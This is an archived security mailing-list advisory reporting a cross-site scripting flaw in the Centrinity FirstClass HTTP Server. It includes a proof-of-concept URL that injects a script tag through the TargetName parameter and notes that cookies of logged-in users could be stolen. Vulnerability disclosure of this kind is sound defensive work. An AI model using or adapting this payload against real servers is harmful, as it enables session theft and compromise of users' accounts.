[<prev] [next>] [day] [month] [year] [list]
Message-ID: <E1B5V7R-0007G5-00@uranium.btinternet.com>
From: r.i.c.h at btopenworld.com (Richard Maudsley)
Subject: Centrinity FirstClass HTTP Server Cross Site Scripting
Product: FirstClass HTTP Server
Developer: Centrinity
URL: http://www.centrinity.com
Description: Injected code is rendered in the context of the vulnerable
page.
Exploit:
http://[TARGET]/.Templates/Commands/Upload.shtml?TargetName=<script>alert('XSS')</script>
It may be possible to steal cookies from users who are logged into the
system.
It is likely that other pages are also vulnerable.
As usual, OpenText will not follow up this report, and it can be filed away
with numerous other unpatched FirstClass bugs, hacks and exploits:
http://search.securityfocus.com/swsearch?query=firstclass&metaname=swishtitle
Enjoy,
Richard Maudsley
www.mindblock.org
hey, jaw :)
Powered by blists - more mailing lists